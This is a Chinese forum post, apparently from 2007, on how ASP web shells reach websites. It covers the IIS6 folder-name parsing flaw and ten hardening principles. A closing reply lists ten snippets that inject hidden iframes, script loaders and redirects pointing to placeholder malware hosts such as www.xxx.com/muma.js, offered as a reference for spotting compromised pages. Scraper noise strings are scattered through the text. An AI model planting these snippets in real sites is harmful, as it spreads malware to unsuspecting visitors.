A。为什么好好的网站会有木马? 一般木马是来自ASP SHELL和PHP SHELL的程序段控制不严,程序上有上传功能,没有进行文件目录和文件后缀等的判断,一般这类的目录,以“海阳顶端网ASP木马”较为流行。 7 H9 j0 `1 L- [1 O2 }' \1 a/ X- q
因2003平台IIS6原因,也存在目录名问题引起ASP木马。(微软的IIS 6存在严重解析文件名错误 测试办法:在FTP中建立一个 test.asp 的文件夹,文件夹名就是 test.asp ,在这个文件夹中上传一个 hack.jpg,这个jpg的内容可以直接是,然后,用IE远程访问这个hack.jpg,你可以发现,它一样被当作是ASP文件来运行!显然,只要你的网站程序,允许用户自己建立文件夹及上传图片,黑客就可以上传图片来当作ASP木马来运行。 1 k& j/ Z1 _' P# [6 U
解决办法:所有使用虚拟主机管理平台的虚拟主机用户,可以在主机面板,设置执行权限选项中,直接将有上传权限的目录,取消ASP的运行权限,就可以解决这个问题。
+ f# k6 W+ F1 x4 X7 [大家常用的动易2006和动网,BLOG这类的程序,需要详细的检查一下,并跟着开发者进行相应的安全程序升级。这样才能减少因代码原因引起的网站被黑。 : g) Y6 r" I; V" D3 g
B。网站被黑了,如何检查是那些网页有问题呢。 目前流行的网站被黑,是在相应的asp,htm,js等文件中,插入<iframe src=http:// 这样的,需要使用查找程序来查找这类文件出来,手工删除此类插入的HTML代码。这项工作相对比较繁锁。需要仔细的查找。也会有一些木马是插入到js中,是以js调用方式的。更详细的资料,请看后部分E.挂马代码大全。 1 q, l: D- B% N0 X- N
C。防范ASP木马的十大基本原则
9 [8 y+ F3 P5 g6 o5 ~1 W. k) Q 由于ASP它本身是服务器提供的一贡服务功能,特别是最近由dvbbs的upfile文件出现漏洞以来,其高度的隐蔽性和难查杀性,对网站的安全造成了严重的威胁。因此针对ASP木马的防范和清除,为网管人员提出了更高的技术要求.
& `& h) Y$ g0 v7 U5 V8 ], g2 u) M# m 几个大的程序全部被发现存在上传漏洞,小程序更是不计其数,让asp木马一下占据了主流,得到广泛的使用,想必如果你是做服务器的话,一定为此头疼不止吧,特别是虚拟主机的用户都遇到过网页被篡改、数据被删除的经历,事后除了对这种行径深恶痛绝外,许多客户又苦于没有行之有效的防范措施。鉴于大部分网站入侵都是利用asp木马完成的,特写此文章以使普通虚拟主机用户能更好地了解、防范asp木马。也只有空间商和虚拟主机用户共同做好防范措施才可以有效防范asp木马! b, x" [6 O9 U% ?& K
我们首先来说一下怎么样防范好了,说到防范我们自然要对asp木马的原理了,大道理我也不讲了,网上的文章有的是,简单的说asp木马其实就是用asp编写的网站程序,甚至有些asp木马就是由asp网站管理程序修改而来的。就比如说我们常见的asp站长助手,等等 ) ?% n1 Q7 v. Z3 c0 f
它和其他asp程序没有本质区别,只要是能运行asp的空间就能运行它,这种性质使得asp木马非常不易被发觉。它和其他asp程序的区别只在于asp木马是入侵者上传到目标空间,并帮助入侵者控制目标空间的asp程序。严重的从而获取服务器管理员的权限,要想禁止asp木马运行就等于禁止asp的运行,显然这是行不通的,这也是为什么asp木马猖獗的原因!有人要问了,是不是就没有办法了呢,不,有办法的: 6 N# f- m: R) T
第一:从源头入手,入侵者是怎么样上传asp木马的呢?一般哟几种方法,通过sql注射手段,获取管理员权限,通过备份数据库的功能将asp木马写入服务器。或者进入后台通过asp程序的上传功能的漏洞,上传木马等等,当然正常情况下,这些可以上传文件的asp程序都是有权限限制的,大多也限制了asp文件的上传。(比如:可以上传图片的新闻发布、图片管理程序,及可以上传更多类型文件的论坛程序等),如果我们直接上传asp木马的话,我们会发现,程序会有提示,是不能直接上传的,但由于存在人为的asp设置错误及asp程序本身的漏洞,给了入侵者可乘之机,实现上传asp木马。 $ w# t& g/ q/ ~4 {1 s. F# g- |
因此,防范asp木马的重点就在于虚拟主机用户如何确保自己空间中asp上传程序的安全上,如果你是用别人的程序的话,尽量用出名一点的大型一点的程序,这样漏洞自然就少一些,而且尽量使用最新的版本,并且要经常去官方网站查看新版本或者是最新补丁,还有就是那些数据库默认路径呀,管理员密码默认呀,一定要改,形成习惯保证程序的安全性。
2 q) X5 ]# S7 W/ j* v: w$ K 那么如果你是程序员的话,我还想说的一点就是我们在网站程序上也应该尽量从安全的角度上编写涉及用户名与口令的程序最好封装在服务器端,尽量少的在ASP文件里出现,涉及到与数据库连接地用户名与口令应给予最小的权限; 需要经过验证的ASP页面,可跟踪上一个页面的文件名,只有从上一页面转进来的会话才能读取这个页面。防止ASP主页.inc文件泄露问题; 防止UE等编辑器生成some.asp.bak文件泄露问题等等特别是上传功能一定要特别注意
' i9 u7 P1 [3 V m: @; g) y: f2 `5 k0 UASP木马防范的十大原则供大家参考:
! z3 l5 ?/ j) K 1、建议用户通过ftp来上传、维护网页,尽量不安装asp的上传程序。 & P" K' d' {# ~
2、对asp上传程序的调用一定要进行身份认证,并只允许信任的人使用上传程序。
4 K6 S. d; [, w! n" @) W* Z, V 这其中包括各种新闻发布、商城及论坛程序,只要可以上传文件的asp都要进行身份认证!
! l7 K* F( J* E. {* b& o 3、asp程序管理员的用户名和密码要有一定复杂性,不能过于简单,还要注意定期更换。
. E6 N) t8 p* G5 P+ o' l( H; | 4、到正规网站下载asp程序,下载后要对其数据库名称和存放路径进行修改,数据库文件名称也要有一定复杂性。 - J" s: P5 o- o0 l, j
5、要尽量保持程序是最新版本。
" ~! L. p* z( Y, q$ G! \ 6、不要在网页上加注后台管理程序登陆页面的链接。 + I) \. A+ I2 @4 I5 a- I- l
7、为防止程序有未知漏洞,可以在维护后删除后台管理程序的登陆页面,下次维护时再通过ftp上传即可。 1 Q0 l; }9 ^* E. v
8、要时常备份数据库等重要文件。
5 [" y1 D# y3 z- x. n- X) H 9、日常要多维护,并注意空间中是否有来历不明的asp文件。记住:一分汗水,换一分安全! + C0 S$ _/ X' N( _ o- S4 J- ^9 ]/ K
10、一旦发现被入侵,除非自己能识别出所有木马文件,否则要删除所有文件。 ! @1 s' |& T+ U; O# g0 q6 O% p: Q
重新上传文件前,所有asp程序用户名和密码都要重置,并要重新修改程序数据库名称和存放路径以及后台管理程序的路径。 , r; p! v$ ] U! X, ~. `6 e
做好以上防范措施,您的网站只能说是相对安全了,决不能因此疏忽大意,因为入侵与反入侵是一场永恒的战争 * A0 Q3 ?6 m: ], h% |# }
-------------------------------------------------------------------------------- ' E0 b) p$ n/ @ B2 T- x- w
挂马代码大全 ps:检查文件是否被挂马的时候可以参考下! 作者:Fufu 时间:2007-5-9 12:38:54第3楼
+ c% w2 E4 V8 V/ x! _% _$ c" q* y5 Q# `% ~$ M5 O# d
一:框架挂马
* A+ S J2 i+ J; i, W) L<iframe src=地址 width=0 height=0></iframe> ) P/ r* _0 a c0 I( F' @
二:js文件挂马 9 u L4 e/ |5 g& ~% b0 @2 Z
首先将以下代码 document.write("<iframe width='0' height='0' src='地址'></iframe>"); 保存为xxx.js, 则JS挂马代码为 <script language=javascript src=xxx.js></script> ' ^( y2 H' @: @! a1 h. }. D) q
三:js变形加密
' ]- l$ |1 W. V& [, W$ e<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script> muma.txt可改成任意后缀 四:body挂马 ; s: n& p7 k0 q8 g
<body onload="window.location='地址';"></body>
+ Y+ f$ G6 x& z5 e" S, x五:隐蔽挂马
1 s1 l- M7 ]# Q3 N+ [- Otop.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="http://www.xxx.com/muma.htm/"></iframe>'; 1 ?' b9 u. K& P7 X2 V* C
六:css中挂马
6 X7 z( u! H# o" q( Hbody { background-image: url('javascript:document.write("<script src=http://www.XXX.net/muma.js></script>")')} 5 m+ V" T* Q- ~2 F# p- y
七:JAJA挂马
5 u* l, Z' ~( T% N# x* H<SCRIPT language=javascript> window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1"); </script>
- d& Z$ @- L. j. i/ V+ i, S2 _% ~八:图片伪装
' {( T# @, `+ e, M, ?2 O<html> <iframe src="网马地址" height=0 width=0></iframe> <img src="图片地址"></center> </html> " Z ^1 ~4 W5 g2 a0 M4 G1 i
九:伪装调用: 9 l) r: t' }* r& `. k( g
<frameset rows="444,0" cols="*"> <frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0"> <frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0"> </frameset> 9 x' N, c: ^) L) y, W; O
十:高级欺骗 # |" S' e7 k' L3 \! n$ Q4 A- ~
<a href="http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)" onMouseOver="www_163_com(); return true;"> 页面要显示的内容 </a> <SCRIPT Language="JavaScript"> function www_163_com () { var url="网马地址"; open(url,"NewWindow","toolbar=no,location=no,directories=no, status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10"); } </SCRIPT> |